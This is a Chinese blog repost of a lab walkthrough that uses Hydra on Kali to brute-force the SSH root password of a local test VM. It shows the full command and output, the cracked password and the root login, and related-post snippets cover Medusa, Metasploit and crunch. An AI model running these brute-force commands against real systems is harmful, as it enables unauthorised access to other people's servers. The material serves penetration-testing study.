Kali系列之hydra ssh密码爆破

最新推荐文章于 2024-04-02 16:36:24 发布
最新推荐文章于 2024-04-02 16:36:24 发布
阅读量1.6k 收藏 1
点赞数 1
文章标签: 运维
原文链接:http://www.cnblogs.com/chenglee/p/8805871.html
版权

环境

kali 192.168.137.131

靶机 192.168.137.133

语句

hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133

状态

root@kali:/home/chenglee# hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-12 10:21:01
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 213561 login tries (l:1/p:0), ~213561 tries per task
[DATA] attacking ssh://192.168.137.133:22/
[STATUS] 96.00 tries/min, 96 tries in 00:00h, 0 to do in 01:00h, 213465 active
[22][ssh] host: 192.168.137.133   login: root   password: lizhenghua
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-12 10:23:47
root@kali:/home/chenglee# ss
ss           ssh2john     ssh-argv0    ssh-keygen   sshow        ssldump      sslscan      sslstrip     
sselp        ssh-add      ssh-copy-id  ssh-keyscan  ssid         sslh         sslsniff     sslyze       
ssh          ssh-agent    sshd         sshmitm      sslcaudit    sslh-select  sslsplit     ss_spike     
root@kali:/home/chenglee# ssh root@192.168.137.133
root@192.168.137.133's password: 
Last login: Thu Apr 12 17:15:19 2018 from 192.168.137.1
[root@localhost ~]# ipaddr
-bash: ipaddr: command not found
[root@localhost ~]# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:85:c0:fa brd ff:ff:ff:ff:ff:ff
    inet 192.168.137.133/24 brd 192.168.137.255 scope global eth0
    inet6 fe80::20c:29ff:fe85:c0fa/64 scope link 
       valid_lft forever preferred_lft forever

 

转载于:https://www.cnblogs.com/chenglee/p/8805871.html

weixin_34242819
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
kali hydra mysql_Kali系列hydra ssh密码爆破
weixin_30744613的博客
01-27 402
root@kali:/home/chenglee# hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organiza...
vulnhub靶机-FIRSTBLOOD: 1
臭nana的博客
09-25 1681
绪论:这个靶机比较简单,因为每一步都有提示,而且基本命令都给出来了 1、找到靶机ip:192.168.74.130 nmap -sn 192.168.74.0/24 2、扫描靶机端口,得到80端口和60022端口(ssh服务) root@kali:~# nmap -A -p- 192.168.74.130 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.130 Host is up (0.000
Linux/Nineveh
最新发布
ve9etable的博客
04-02 820
先使用 nmap 扫描常见端口,发现只开放了 80 和 443 端口,不想扫描详细信息了两个端口展示的内容不同,80 端口显示如下443 端口显示如下Web 页面中都没有什么东西,使用 gobuster 扫描一下目录。
hydra
Blog_inG的博客
09-07 1639
root@kali:~# hydra -h Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|
kali暴力破解教程
热门推荐
苏权的专栏
04-05 1万+
本文为原创,转载请注明出处及作者! kali是渗透工作者的得力兵器,今天带领初学者怎么快速实现暴破,所需要的工具都能在kali中找到。不多说了,开始吧~ 1.打开终端,运行命令crunch,这个是字典生成工具,可以根据用户的要求生成字典。具体参数大家可以看手册,这里简单说一下即可: crunch 1 4 charset.lst lalpha -o mypwd.txt 上述命令生成最短
Kali系列之root账户ssh远程登录配置.docx
12-06
新版kali安装时root账户默认密码为空,根据密码安全策略密码为空时不能登录,登录时会报错,默认情况下ssh服务关闭。本文介绍了如何设置root密码以及配置并开启ssh服务。
Kali系列之workstations环境下安装kali.docx
12-06
Kali Linux是基于Debian GNU/Linux的企业级安全审计Linux发行版。Kali的目标用户是安全专业人员和IT管理员,其能够应用于高级渗透测试,取证分析和安全审计等领域。 Kali Linux预装了许多渗透测试软件,包括nmap 、...
KALI渗透测试之密码破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali密码破解工具使用。
Kalissh爆破以及nikto工具漏洞扫描-漏洞银行大咖周3 -屌丝绅士
01-26
来源:漏洞银行大咖面对面一周大咖秀3 作者:屌丝绅士
kali hydra工具介绍
有勇气的牛排博客
07-22 693
目录1 介绍2 安装2.1 Debian和Ubuntu2.2 Redhat/Fedora2.3 自行安装2.4 命令介绍3 实际案例3.1 破解FTP3.2 get方式提交,破解web登录3.3 post方式提交,破解web登录:3.4 破解https 1 介绍 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。本文仅从安全角度去探讨测试,使用本文内容去做破坏者,与本人无关。 hydra是著名黑客组织t
Kali】中密码暴力破解工具hydra的使用
xueshenlaila的博客
03-10 1万+
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具的使用,请勿用于非法用途。 hydra参数讲解 -R #继续从上一次进度接着破解。 -S #采用SSL链接。 -s #PORT 可通过这个参数指定非默认端口。 -l #LOGIN 指定破解的用户,对特定用户破解。 -L #FILE 指定用户名字典。 -p #PASS 小写,指定密码破解,少用,一般是采用密
使用kali+hydra爆破win7用户密码
自知.的博客
03-19 3083
使用hydra暴力破解windows7的密码,适合网安小白学习。
关于如何解决启动Kali报错问题
adm3n的博客
01-12 5615
之前用win7系统的时候,我的VMware虚拟机启动Kali的时候出现了报错,但是vritualbox虚拟机没有报错,所以我就没有在意这个问题。后来系统更新win11,然后这两个虚拟机都不能用了,随后我便开始查找报错原因。 报错的解决方法: 随后便发现windows系统本身自带的虚拟主机hyper-v与现在安的虚拟机VMware发生了冲突,只需关闭它就OK了。 具体步骤如下: 一: 打开控制面板(桌面没有的安键盘上的win键进行搜索!)。 二: 在控制面板界面搜索:启用或关闭...
SSH端口爆破及其应急响应方案
m0_58540923的博客
07-26 1690
Secure Shell (安全外壳协议,简称SSH) 是一种加密的网络传输协议;用途:安全远程登录;可帮助我们在windows下去连接并操作linux服务器。常见的SSH客户端有putty、SSH Secure Shell、MobaXterm 、Xshell等;常用端口:22爆破时间、爆破用户、攻击者ip、攻击方式。
kali:工具之hydra
lm19770429的专栏
05-11 2143
hydra:据说也有图形界面 看自身帮助绝对够用,关键是字典 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l L
kali之再谈hydra暴力破解
lm19770429的专栏
04-04 507
xhydrahydra的图形工具,本以为会很好用,但是世事艰辛 这个工具在于字典的准备,下面留个记录,准备字典的过程。
HYDRA通用命令手册
高野02blog
12-08 784
名称 hydra-一种非常快速的网络登录破解程序,支持许多不同的服务 概要 [-l登录| -L文件] [-p通过| -P文件| -x OPT -y]] | [-C FILE] [-e nsr] [-u] [-f | -F] [-M文件] [-o文件] [-b格式] [-t任务] [-T任务] [-w时间] [-W时间] [-m选项] [-s端口] [-c时间] [-S] [-O] [-4 | 6] [-I] [-v...
Kali系列Hydra/Medusa mysql密码爆破
05-13
Hydra和Medusa是常用的密码爆破工具,可以用于测试弱密码。这里以MySQL为例进行演示。 首先,安装Hydra和Medusa。在Kali Linux中,可以使用以下命令安装: ``` sudo apt-get install hydra sudo apt-get install ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值